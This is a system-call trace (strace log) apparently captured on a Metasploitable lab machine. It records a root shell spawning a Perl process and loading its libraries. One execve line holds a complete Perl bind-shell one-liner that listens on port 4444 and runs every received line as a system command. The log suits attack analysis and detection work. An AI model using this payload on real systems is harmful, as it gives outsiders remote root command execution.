7623  07:19:37.951177 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

7623  07:19:37.951192 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

7623  07:19:37.951281 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

7623  07:19:37.951298 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e00000

7623  07:19:37.951310 mmap2(0xb7e09000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7e09000

7623  07:19:37.951328 close(1)          = 0

7623  07:19:37.951350 munmap(0xb7fbb000, 29913) = 0

7623  07:19:37.951366 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

7623  07:19:37.951380 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

7623  07:19:37.951392 _llseek(1, 0, [0], SEEK_CUR) = 0

7623  07:19:37.951404 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

7623  07:19:37.951430 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7fc2000

7623  07:19:37.951444 _llseek(1, 1624, [1624], SEEK_SET) = 0

7623  07:19:37.951459 munmap(0xb7fc2000, 1624) = 0

7623  07:19:37.951469 close(1)          = 0

7623  07:19:37.951499 getpgrp()         = 3831

7623  07:19:37.951509 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

7623  07:19:37.951524 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

7623  07:19:37.951540 brk(0x8101000)    = 0x8101000

7623  07:19:37.951572 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7623  07:19:37.951586 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7623  07:19:37.951601 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

7623  07:19:37.951638 brk(0x8102000)    = 0x8102000

7623  07:19:37.951664 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7623  07:19:37.951683 stat64("/sbin/AB", 0xbfd803d8) = -1 ENOENT (No such file or directory)

7623  07:19:37.951696 stat64("/bin/AB", 0xbfd803d8) = -1 ENOENT (No such file or directory)

7623  07:19:37.951707 stat64("/usr/sbin/AB", 0xbfd803d8) = -1 ENOENT (No such file or directory)

7623  07:19:37.951719 stat64("/usr/bin/AB", 0xbfd803d8) = -1 ENOENT (No such file or directory)

7623  07:19:37.951736 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

7623  07:19:37.951751 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e366f8) = 7624

7624  07:19:37.951800 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7624  07:19:37.951816 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

7624  07:19:37.951829 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

7624  07:19:37.951841 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

7624  07:19:37.951857 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7624  07:19:37.951873 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7624  07:19:37.951885 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

7624  07:19:37.951987 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

7624  07:19:37.952003 --- SIGPIPE (Broken pipe) @ 0 (0) ---

7624  07:19:37.952088 exit_group(127)   = ?

4519  07:19:37.975100 waitpid(7623,  <unfinished ...>

7623  07:19:37.975100 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7623  07:19:37.975104 --- SIGCHLD (Child exited) @ 0 (0) ---

7623  07:19:37.975118 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 7624

7623  07:19:37.975134 waitpid(-1, 0xbfd80058, WNOHANG) = -1 ECHILD (No child processes)

7623  07:19:37.975145 sigreturn()       = ? (mask now [])

7623  07:19:37.975169 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

7623  07:19:37.975184 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7623  07:19:37.975195 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

7623  07:19:37.975207 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

7623  07:19:37.975224 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7623  07:19:37.975235 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

7623  07:19:37.975268 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

7623  07:19:37.975288 stat64("/sbin/perl", 0xbfd80408) = -1 ENOENT (No such file or directory)

7623  07:19:37.975300 stat64("/bin/perl", 0xbfd80408) = -1 ENOENT (No such file or directory)

7623  07:19:37.975311 stat64("/usr/sbin/perl", 0xbfd80408) = -1 ENOENT (No such file or directory)

7623  07:19:37.975322 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

7623  07:19:37.975339 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

7623  07:19:37.975363 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

7623  07:19:37.975377 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e366f8) = 7625

7625  07:19:37.975423 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

7625  07:19:37.975438 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

7625  07:19:37.975451 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

7625  07:19:37.975479 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

7625  07:19:37.975521 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

7625  07:19:37.975537 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

7625  07:19:37.975563 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

7625  07:19:37.975596 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

7625  07:19:37.975682 brk(0)            = 0x8153000

7625  07:19:37.975702 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7625  07:19:37.975717 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f77000

7625  07:19:37.975732 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

7625  07:19:37.975749 open("/etc/ld.so.cache", O_RDONLY) = 1

7625  07:19:37.975761 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

7625  07:19:37.975778 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f6f000

7625  07:19:37.975788 close(1)          = 0

7625  07:19:37.975798 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7625  07:19:37.975818 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

7625  07:19:37.975832 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

7625  07:19:37.975921 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

7625  07:19:37.975938 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f6b000

7625  07:19:37.975950 mmap2(0xb7f6d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f6d000

7625  07:19:37.975979 close(1)          = 0

7625  07:19:37.976021 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7625  07:19:37.976052 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

7625  07:19:37.976085 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

7625  07:19:37.976171 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

7625  07:19:37.976187 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f46000

7625  07:19:37.976198 mmap2(0xb7f69000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f69000

7625  07:19:37.976214 close(1)          = 0

7625  07:19:37.976225 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7625  07:19:37.976238 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

7625  07:19:37.976252 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

7625  07:19:37.976339 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

7625  07:19:37.976356 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f45000

7625  07:19:37.976368 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f2d000

7625  07:19:37.976379 mmap2(0xb7f41000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f41000

7625  07:19:37.976392 mmap2(0xb7f43000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f43000

7625  07:19:37.976406 close(1)          = 0

7625  07:19:37.976417 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7625  07:19:37.976430 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

7625  07:19:37.976443 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

7625  07:19:37.976585 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

7625  07:19:37.976617 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dde000

7625  07:19:37.976628 mmap2(0xb7f27000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f27000

7625  07:19:37.976642 mmap2(0xb7f2a000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f2a000

7625  07:19:37.976655 close(1)          = 0

7625  07:19:37.976667 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

7625  07:19:37.976680 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

7625  07:19:37.976694 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

7625  07:19:37.976783 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

7625  07:19:37.976800 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dac000

7625  07:19:37.976811 mmap2(0xb7db5000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7db5000

7625  07:19:37.976825 mmap2(0xb7db7000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7db7000

7625  07:19:37.976839 close(1)          = 0

7625  07:19:37.976863 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7dab000

7625  07:19:37.976875 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7dab8c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

7625  07:19:37.976933 mprotect(0xb7f27000, 4096, PROT_READ) = 0

7625  07:19:37.976970 munmap(0xb7f6f000, 29913) = 0

7625  07:19:37.977014 set_tid_address(0xb7dab908) = 7625

7625  07:19:37.977024 set_robust_list(0xb7dab910, 0xc) = 0

7625  07:19:37.977050 futex(0xbfbda870, 0x81 /* FUTEX_??? */, 1) = 0

7625  07:19:37.977078 rt_sigaction(SIGRTMIN, {0xb7f312c0, [], SA_SIGINFO}, NULL, 8) = 0

7625  07:19:37.977091 rt_sigaction(SIGRT_1, {0xb7f31340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

7625  07:19:37.977104 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

7625  07:19:37.977117 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

7625  07:19:37.977136 uname({sys="Linux", node="metasploitable", ...}) = 0

7625  07:19:37.977195 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

7625  07:19:37.977239 brk(0)            = 0x8153000

7625  07:19:37.977249 brk(0x8174000)    = 0x8174000

7625  07:19:37.977291 getuid32()        = 0

7625  07:19:37.977301 geteuid32()       = 0

7625  07:19:37.977310 getgid32()        = 0

7625  07:19:37.977318 getegid32()       = 0

7625  07:19:37.977354 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d8a000

7625  07:19:37.977381 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

7625  07:19:37.977398 read(1, "e#k,", 4) = 4

7625  07:19:37.977411 close(1)          = 0

7625  07:19:37.977428 time(NULL)        = 1495624777

7625  07:19:37.977532 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfbda540) = -1 ENOENT (No such file or directory)

7625  07:19:37.977566 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfbda540) = -1 ENOENT (No such file or directory)

7625  07:19:37.977592 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfbda540) = -1 ENOENT (No such file or directory)

7625  07:19:37.977608 stat64("/usr/local/lib/perl/5.8.7", 0xbfbda680) = -1 ENOENT (No such file or directory)

7625  07:19:37.977620 stat64("/usr/local/share/perl/5.8.7", 0xbfbda680) = -1 ENOENT (No such file or directory)

7625  07:19:37.977632 stat64("/usr/local/lib/perl/5.8.6", 0xbfbda680) = -1 ENOENT (No such file or directory)

7625  07:19:37.977643 stat64("/usr/local/share/perl/5.8.6", 0xbfbda680) = -1 ENOENT (No such file or directory)

7625  07:19:37.977654 stat64("/usr/local/lib/perl/5.8.4", 0xbfbda680) = -1 ENOENT (No such file or directory)

7625  07:19:37.977666 stat64("/usr/local/share/perl/5.8.4", 0xbfbda680) = -1 ENOENT (No such file or directory)

7625  07:19:37.977677 stat64("/usr/local/lib/perl/5.8.3", 0xbfbda680) = -1 ENOENT (No such file or directory)

7625  07:19:37.977689 stat64("/usr/local/share/perl/5.8.3", 0xbfbda680) = -1 ENOENT (No such file or directory)

7625  07:19:37.977700 stat64("/usr/local/lib/perl/5.8.2", 0xbfbda680) = -1 ENOENT (No such file or directory)

7625  07:19:37.977711 stat64("/usr/local/share/perl/5.8.2", 0xbfbda680) = -1 ENOENT (No such file or directory)

7625  07:19:37.977723 stat64("/usr/local/lib/perl/5.8.1", 0xbfbda680) = -1 ENOENT (No such file or directory)

7625  07:19:37.977734 stat64("/usr/local/share/perl/5.8.1", 0xbfbda680) = -1 ENOENT (No such file or directory)

7625  07:19:37.977749 stat64("/usr/local/lib/perl/5.8.0", 0xbfbda680) = -1 ENOENT (No such file or directory)

7625  07:19:37.977761 stat64("/usr/local/share/perl/5.8.0", 0xbfbda680) = -1 ENOENT (No such file or directory)

7625  07:19:37.977783 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfbda378) = -1 ENOTTY (Inappropriate ioctl for device)

7625  07:19:37.977796 _llseek(0, 0, [0], SEEK_CUR) = 0

7625  07:19:37.977808 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfbda378) = -1 EBADF (Bad file descriptor)

7625  07:19:37.977818 _llseek(1, 0, 0xbfbda3c0, SEEK_CUR) = -1 EBADF (Bad file descriptor)

7625  07:19:37.977829 ioctl(2, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfbda378) = -1 EINVAL (Invalid argument)

7625  07:19:37.977839 _llseek(2, 0, 0xbfbda3c0, SEEK_CUR) = -1 ESPIPE (Illegal seek)

7625  07:19:37.977849 open("/dev/null", O_RDONLY|O_LARGEFILE) = 1

7625  07:19:37.977862 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfbda438) = -1 ENOTTY (Inappropriate ioctl for device)

7625  07:19:37.977872 _llseek(1, 0, [0], SEEK_CUR) = 0

7625  07:19:37.977882 fcntl64(1, F_SETFD, FD_CLOEXEC) = 0

7625  07:19:37.977893 fstat64(1, {st_mode=S_IFCHR|0666, st_rdev=makedev(1, 3), ...}) = 0

7625  07:19:37.977911 rt_sigaction(SIGCHLD, NULL, {SIG_DFL}, 8) = 0

7625  07:19:37.977973 readlink("/proc/self/exe", "/usr/bin/perl", 4095) = 13

7625  07:19:37.978064 getppid()         = 7623

7625  07:19:37.978126 stat64("/etc/perl/IO.pmc", 0xbfbda12c) = -1 ENOENT (No such file or directory)

7625  07:19:37.978140 stat64("/etc/perl/IO.pm", 0xbfbda03c) = -1 ENOENT (No such file or directory)

7625  07:19:37.978167 stat64("/usr/local/lib/perl/5.8.8/IO.pmc", 0xbfbda12c) = -1 ENOENT (No such file or directory)

7625  07:19:37.978179 stat64("/usr/local/lib/perl/5.8.8/IO.pm", 0xbfbda03c) = -1 ENOENT (No such file or directory)

